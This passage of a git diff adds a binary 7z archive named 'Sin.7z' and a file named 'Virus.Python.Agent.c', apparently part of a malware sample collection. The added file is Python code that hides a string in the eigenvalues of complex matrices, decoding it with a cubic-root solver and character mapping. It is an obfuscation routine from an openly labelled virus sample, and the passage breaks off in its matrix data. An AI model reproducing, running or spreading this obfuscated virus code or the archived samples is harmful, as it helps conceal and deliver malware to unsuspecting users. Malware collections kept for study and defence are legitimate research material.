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 literal 0 HcmV?d00001 diff --git a/Python/Sin.7z b/Python/Sin.7z new file mode 100644 index 0000000000000000000000000000000000000000..75212a096420aa8dd5363089441350bc27bc9c1e GIT binary patch literal 4397 zcmV+|5z_8Adc3bE8~_B?J4$)#5C8xG0000Z0000000019Y%#syHG~h#T>vv2iXv~S zpG98EjgOsn&xk7)&R!W1D1t)1tfN+YnS?}J?4u`N>2NprK|pXJWr375_v6?8@q$P* zyWP1l-Adn_ltHGS<>$p?2|_Gqz+c7<Bq&CdK{zB;{Jw!IInx@j^#Sx0@D`NxOEUJ) z$E@y*zki72tA}Ha1DW)r#6b$0%PC1a@x=4TvlzsF84xSIujb_U_Lui4Aj|?_p=9Dl zi_~q-%@P>}-$c#Zp;gUPqg{#_pxl5S%|{b22Ch@bCn;y7J?>;6v^nIXrGXYf2SF0S zHEqRsr**;#dad@Ec#|>GDNaVxK7OQR&HTxG*!WX=EnwNdQ;LnNKu6~X{reyED80e| zKYX2l^w-{$^e~H%F+&L!el?5Gjh<)i5S#QoRZ=v;_cdr^H}2sQws7crueW8H(533} z%(-}j^lke4Oh-LI=6^Y5rTKv}=J;N{#pi+6gas5kcRcL(s2HWl9J^oazp{<$w=sB; zIrAp3%{;Y;=z`(ra=h2aH!iJv9veEtOCIdJe9Q#c{}ddnI@+kKJdmm1my=Q=U*yuQ zWC0~_efB`&E<57!HN>t_h<PiX7`UZetd6IHd~Z6zVJ$^8<|mBDVB_}|P%N@6!yKm! zfeQ$$a=&JX3M2B^zM|AV*eLdUW|~$+L$X?y+Up@o+DlB>{GyF!j|p%kj-6YCRH`?! ztmaNKL)(wTP_T<dBB=|;b87zmYc57tU7F0z#k)qo_-OXEUO-s#C1%ghg;rpA4$HqC zYS6`M>%s#Tlc3Z8##qvmMg0fqg@eLm@*);s>vL47sziUhFyWUpq+6rgQ$mQSvkT7t z^4dTISa?lZ;?7&V4g7Rc2E10znl}hg(g_Hytn9lwP+Q*6Weig~z0&58D)@7aC%T?V z5|6V`EUR?BGjhiPn+IO-1xIyPth*mP1R%oMa(mUzJ2d7fi<*U8kw6=%2~IQgSN%fF ziF9jsQ~p&hrmy738k27z-Xkt-vrQi`5Ov~=4m}6O$}28XdB3A%8}5YYjwrYs_0ReV zU6RDC-n<o}YoKfv?J;9_3&`1NZ%l-J@o9&ncxc0!8|w+i=rHN?QHYdE?#bibrRBWT z>DXra6(PqDl<1I+i%sK%w%*FozYl-WL_v1gKNo4PbM}A;;`|n?5LR&Ax@=0KXJM5N z2ebuy6<KF$Ee1r@OWyw)@l7Es7yzPMrzF)Hb5w0e6#j}vQ?<+Ut*c`FnI>LaT-6lo zPj2Ulk4s(Zuz#jO&jy>kO#-mYA3{$Ut`9eI4JWp?ovYn0kl#?G953hJRaIh>?puW{ zBi3+J%?t-~bOUAqzi`Td;#`$1JWCi>@P&QSjdqE0?g1}ti-n}B{5^>kUP2al42({3 zP5O_<rQwXJ_!UBLMeso@Fra`|r7q?Y$)ro<9S>t~zS{HvLi$1>Zb_LN8W8V6;DjZ0 ziCibA@;!fuxRUdS@O<RF*n5+^1kyEX8Z*R@O7tCYiGFQ}UL7FHQ?yw4WX=VzPTTm} z!`Mnh;6A2dG<kf$?g7yl3!%tRsEDiB1DUS>qkUW<+&3%}tZ0u|H&*U;`_C{dPh*&S z<g1wXB-k{o)iN_?*G7>A9J;8?WbBtWS_Ch#hXs%_GTW1*N5WH-zh$<z60$iWS-k*x zK@l>1+U+?q>Gf1~Vj*+<pcKq?btsNs^*VpIAnQ$yQzXUpKI-ya1Jfk7U2^E!(qPX) z5c^R2XD-t}pu-Uy&)0Vgr3%HvMkL74+ezbGZ?ikS@^y%_+mPwB^hc{vSe*BpGqIjR zohj_@B6adM;g?UsAtO}d)|NOO175an1O$!0ZX-Z@#<rpU=HRDbj0^HXqD7)Bv9t<D z=h2sT^)XtKYl^SBj9TIBV|2eX-OT5qClAxi6U+<o98IqAMd7zvN8opRgD?2mo(x#r zX@AYs*QVwmPoadIlNq<BG-kb}gm^umqb%B@Y2zI=peInE>aTBmYm>(f0G{s8_fFJ! znO=i4J}r!Kfrw`V3>l|)P~@AA`_AvOalQx+q9&BKYZjfo@*yGt-3@nfG(jYCds&}G ztpmO}IIxMplW<3(@Ff|4<k2l_M_-R&(TY3Uzf~sz@RUk}NA2~cuy%>8T~R1oO37<6 z_N6~q`n1lbKD~I|Y)52&Ez?4#nYJG+F4?_01|yNWmOCp2!j#_AA-IBP1uq^H29Jqz zVXc5pRT=9|Y@U|hAgm5LjG3w21q!VHMM%>rS1;2Waj$Mkgu$zzF_?)wJdIAR{oHOb zsxBqPk&Oo;Vt^9HE?<kUtm$7Gw_X?YWG@DbM^x}y1kndRTJA{;;U~oCLmrFw_VtsM z6@KM2ppH<|8Q(HLHAdSvThM$o;wj%P<ab2GT|0p<2nO^tayf)3V-}f{QVp4vt`%a} zU7P?CinCsjlld4YZ+k*<j*HFZh&4X51sUw9s!64{wncbY1cZTo;VaFA9A$5f0B5y! z+5d1qj!Fhx^4vh*J#I`=?6RsDS(1=4vJ}}(Jbd!SQ-32RqjHk*1DMmopdj!R$5TW% z*d*W$O#E&yup(^)26C33oKs+1Mj}X)MsSb~u&!Q&mAZ9N5WQYy-ORITuRivxjSZ{s zS-3Sx2G_^K{D~QnDdTR`i)jNSW2|%TqUwb?F}f28f-HQJ%*9%(%HQzt)xT-AIhN_S z_SiFB)Ajw3FI7?-SmOp?Me_1z3G}HK@mENPdO1MXV@KV;{%O7@;tV_HBBS|oKyTx) z<kj@Vf#Xk8=KYQd`K^j}(P8YD>a=2CUM+nTXe3DCE!9m*%l?$IAFxddZ@obmN^b5h z2*{0uVauyX=6DM($M+BGf7Z--0^B+4m8GR?Q0o7~QA~^=O__}$D#HqV!jfJadItEc z3xkQxnl#Ba)!v9|y8}BmVGcflmvGkwtbiOy6^S6o39b_&1%{vtG|<;gx%3TdbfV`~ zz7w^{GkhTr<aXiUmBSlqfRU12T{?zC`@EP%T^rZ56RfuX^_q3`+D9pE>iS5Ws9j45 zrAkeut^Za*bSrlkmzYEMnW_x0(}3Jzk5C*q0cHl4gZ-x(XDU2D&@QXw@lc#E6b0M* zZ<9F{rRfwAl$pxSNn5z3@=d;;q1Hy#ek1wrb<5)Aze=<wr$`r`w0PJSr&zaD9PHP` zph)EAFW$K%`qixf=OotSe^H;PGdl_&>VX>vK32fY`nv7}NuMUggX!LeVg51pul^)E zWc*%1*QMnIB$|{_En?Ka4vh1ldV&o8%A$gSL8Sx|nzBiwEV~Gx>%{Y8Br{3T8~-TM zk${)+pP$47)>RgPyR&!Mc#+Mp3c;E#{8Jn$iXO#`RS?{pk`j$(ty`=!tf#S7&FUZn z4mh#YeojT|-LTj8w3y3K<u5z2$`Wob5%L@!q7Uwp6x=XM-e3(6i(s(*Op!9?^m6-A zD){)>?N*Z_%QtNhDoHxNo2?kr(oJ>*i&<FAgfJyX%#^VH=gfw#8d9X0Y5K9HdWech z=~}(NVDm6hM{Up8_Ev)am@E6sxMXs6y@T!{7wg|p#IRMkJv@Fu42US>69NS6CZr(& zw!^gwGzq;Yfh+gIfUOc}@Z_DCXz19?V99e@b|l>MD(~F)6EaFn%rwF90-J5bAHpu> zJqTz5aU9>M|LPBS@UZ)Ic>$d*-qu?shc(IP3Cp;0N5B+j{N-n9Z9H@*i}gxUmQ2Oy z!zl~e0{9kr9X-c58c+L~yaicP)(V(*82_E_KRQTbY<{=Zzgm`CBErZOvZ@-p@{~|Q zO)ubYRV0MH)xHrkc0}AX6<*Ui9qz~f0O;!b<-;aWkA32aE3~Tz%)(b{teM3vI+1iD z?ZPh^dt~bpu>fA3{g~PgAKIZ=n`cc5rmzu!YzsN;@2kADEC{cUKrY~U-x_S6StUYT zQncpvmTwf^LLf#xT(IU2xwp;9X`dzub4>%FoDAqX92HG4GiwLMCd@4UzI`^^!~Ctc z8JPba>FpwXEKF!lD(sWXBIGR4b+mfA^fnVUU;?^d%8|m^<m#4&rE|NltfY_K+`I$h zJlVe1fZeDN4t3bKa#CHBwa(+N?BZk#Ie<)2SrAAq?f=_3d#1cPdB-`X29PgJMy#K| zZM2#iU6p(Vf+7)i)^C@RFyx)Yt-VVI*6(~DX?)ZWm!ahwiY=Ze9P8!BhBn!>^Ki-5 zUx~Tzu`bITOn98_BrPAn*7xDjewN~umO&Xh1JX<z0$BR}i*<JK9;+lVFOf)RfM>6K zO3sXLJ8^YVZX|H<AL_5KrzHT(up_xtw#A^0rugf$w>&4VBGKCGR#i^szqJ5pw4?O# zq5|8sIofFG7o4}HX(w8hKTAG`|8BR_5>f4ZhS7lB%o7?Vml(yIMiZ0T06J0${k4Wz zb@4uVUQLBYhM}%`==d2+NO^U@iN3rFL0-*lskg$k%nz&F(DE$G1eq}Lg6RGBCVuib zC1TEA)wZ(7WGh7GZpet4q6MlroYN@+5;WZsn!xC!vEh}YZAz`NIf*-?GH+5Um=&MV z)BJF<aw2;3y`|k(fL1gou@U(@*<<?VXOV6VIg&ThdhDzaB4BfQ3{OYss`=Rs9z?^3 zm*lw@poU<w#9*zoO3Z-9_TcSngNQqCq?wSDiv>9Nvfy2HJ92c33>*L1xCC$2bb#xQ zobP#8J!F%(x|BtZ9diG5SfMN~(Ve30Zf;J4#gfN_v&BCstEBeV>|Qtj6oc4r)UlNS zH=l7#uw?#w(v2>Ii#OQD8UcxzC&-PNtY^6M=m-&+!R=6#QAp}t<lh3gUqk%{TZi&A zBh*Jo>?jPWWVZKJWxE56633xdpI`l1G|{6wd7k~{HZSLxU^hX`3XcO<W##QbZQ&Ni z$nca3Ovndm226o&z|rM=(LpQs^Gn=KNU!;y2rxJlY{VE~g`?P0n8$JZ^8LhrWV%)L zmO3q^S#|(v5*1>`H}=^^wRoO{LeTdPNw|n;qzrr>g$HQg$ycOd_Uf2j4kXO%dKD#k zV1>SnTWpcgEK^E2>3(&O*yms)h~YWM2mR#XEzRF`^}{L2P>z9~9!=BRcMFxV5P?t8 z7j>_i3c5i~WNC+w!eFb@>;CfPPg~aGbY<FDg9lAk%*upIHfFp|GhrhNMX5<UIUa#> z)1_VmNB*)D`RNZq)^Qy<EZm5PfG=GcTb62u-qF_$S72#}X{{lU!L!DAo_gu8E_D@I z#)B!ZHp|}Wug+rNutvs{65~W_qzm5-F^>@jG7;3T%RZn#6@Yza#Pu#<TxN{^mMO+~ zxwqTW;%q8RR7$_0OzOT(hTx#=IRWzw8jLT4Kc|K{=l}o!finlL57pL%$=4*){<Clx zf>u=Sg&3aMQL&uQ=rI#e27Ye;x$9iWxaM>nSx95RP-d9N?o*}k5Yy@WXgRMn+gY>F z*EO~Dg@0~R6k5DI-2dCIu!c#{id;$}yG6_ff#iN|&$}gXk~%EFTT%yj^Q@?m^Fch8 zqZC`T2n5PHqmo&(w!8vS2m<(v1RlGT1E_IdOgTKgnE~KBhIhbRFSBG}zVBGtn(wvP zSS#hDujX2SSD(<=yGUg3WWYiXqF~8+EQ22kmPrKmkmmOTYj3MgXPx?VHlL9|ivNcU zS<6TF&-Ao3yMg??LWB@V8oY><9<K?@|F_nLAu){MIJWJ(A_P<zQ+VImejYS-U`PM} n02c<2(*X&A7XSwf0RRCb0|5aAT>uaO01Sd|3IUVgf35%kHVTop literal 0 HcmV?d00001 diff --git a/Python/Virus.Python.Agent.c b/Python/Virus.Python.Agent.c new file mode 100644 index 00000000..87cfd2f3 --- /dev/null +++ b/Python/Virus.Python.Agent.c @@ -0,0 +1,98 @@ +def root3(num): + fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j + fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j + a=num**(1/3.0) + b=a*fak1 + c=a*fak2 + return([a,b,c]) + +def getPQ(a,b,c): + p = b-((a**2)/3.0) + q = c + ((2*(a**3)-9*a*b)/27.0) + return([p,q]) + +def getU(p,q): + u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0) + return(root3(u3)) + +def getLambda(a,p,u): + if u[0] == 0: + L0=u[0] - a/3.0 + else: + L0=u[0] - p/(3.0*u[0]) - a/3.0 + + if u[1] == 0: + L1=-a/3.0 + else: + L1=u[1] - p/(3.0*u[1]) - a/3.0 + + if u[2] == 0: + L2=-a/3.0 + else: + L2=u[2] - p/(3.0*u[2]) - a/3.0 + + return(L0,L1,L2) + +def getABC(mtx): + a=-(mtx[0]+mtx[4]+mtx[8]) + b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6] + c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6] + return([a,b,c]) + +def eigenvalues(mtx): + ABC=getABC(mtx) + PQ=getPQ(ABC[0],ABC[1],ABC[2]) + U=getU(PQ[0],PQ[1]) + L=getLambda(ABC[0],PQ[0],U) + return(L) + +def getstring(M): + str='' + for c in range(len(M)): + mLD=eigenvalues(M[c]) + for i in range(len(mLD)+1): + for n in range(len(mLD)): + if round(mLD[n].imag)==i: + str+=chr(int(round(mLD[n].real))) + return(str) + +M=[] +M.append([(113.01385812+5.43930508534j),(1.00380746157-8.31965051919j),(0.801104731078+0.936588237838j),(3.54083344964+0.95424311335j),(108.978932614-0.625324609788j),(0.972664728193+3.21561313492j),(-1.96068431273+4.58178510931j),(3.38000675384-5.19874167231j),(109.007209265+1.18601952445j),]) +M.append([(63.0988642714+6.73474244088j),(38.7957438546+7.29183564711j),(34.4164174161-43.9985000655j),(-3.42189631605-2.2839106126j),(113.592704397+4.68789276089j),(3.78797602794+2.84593141297j),(11.8086451552+20.4309988015j),(-3.08750519397-21.3451644199j),(88.308431332-5.42263520176j),]) +M.append([(104.406855517-9.51624929923j),(0.968098716657+10.247486874j),(-10.7284625243-8.95847099578j),(12.9139324019-13.3095003388j),(96.7571541203+10.1186269916j),(7.53204087547-16.3313451185j),(-9.47853339226+0.528078467428j),(6.9494984576+1.54492254096j),(101.835990363+5.39762230766j),]) +M.append([(117.007583423+0.42259290212j),(10.4289001938+0.0037209199438j),(7.38888705374+0.935638896508j),(7.48115014303-3.41289258877j),(109.069280503-0.755948319674j),(3.24478449812-2.16750354816j),(-5.74964216381+9.69321702672j),(-7.26693352937+5.36042347147j),(97.9231360734+6.33335541755j),]) +M.append([(110.186416521-0.282612884393j),(-2.46184250953-5.55813797363j),(4.65778281951-4.75979618248j),(1.2659069035+12.6581511208j),(107.886755805+0.474822088624j),(3.77155367287+6.88744471253j),(-7.42510092378+1.80348448129j),(3.14192118127+4.23989806091j),(97.9268276743+5.80779079577j),]) +M.append([(72.2140022769+61.3183653042j),(-18.8737409148-15.7060435241j),(58.3392636255+30.6485277395j),(-67.1552054341+56.3911897282j),(98.6385647787-16.4179748155j),(56.9733296013+58.133872392j),(45.8159400299-18.7587055968j),(4.2035312554+13.3668119287j),(90.1474329444-38.9003904887j),]) 